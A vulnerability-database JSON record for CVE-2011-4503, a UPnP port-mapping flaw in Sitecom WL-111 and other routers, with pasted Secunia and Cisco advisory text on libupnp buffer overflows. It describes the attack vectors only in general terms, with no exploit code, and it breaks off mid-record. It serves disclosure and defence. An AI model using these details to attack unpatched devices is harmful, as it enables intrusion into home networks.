ZyXEL P-330W
SpeedTouch 5x6 firmware versions prior to 6.2.29
Thomson TG585 firmware versions prior to 7.4.3.2.
----------------------------------------------------------------------
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0159",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": null,
"trust": 2.0,
"vendor": "broadcom",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wl-111",
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.3,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.3,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:broadcom:broadcom_linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sitecom:wl-111:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4503"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4503",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4503",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4503",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-365",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in Broadcom Linux on the Sitecom WL-111 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. A vulnerability exists in the UPnP IGD installation of Broadcom Linux for Sitecom WL-111. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. \nAn attacker can exploit this issue to gain unauthorized access to scan the internal host or proxy internet traffic through an affected device. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. 
\nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. 
\n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. 
This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.77
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.7
},
{
"db": "NVD",
"id": "CVE-2011-4503",
"trust": 3.3
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-5043",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"id": "VAR-201111-0159",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5043"
}
],
"trust": 1.361728088888889
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5043"
}
]
},
"last_update_date": "2023-12-18T12:09:29.415000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.broadcom.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sitecom.com/"
},
{
"title": "Patch for Sitecom WL-111 configuration vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6004"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.9,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 1.6,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4503"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4503"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:05.967000",
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"date": "2013-01-24T05:00:00",
"db": "NVD",
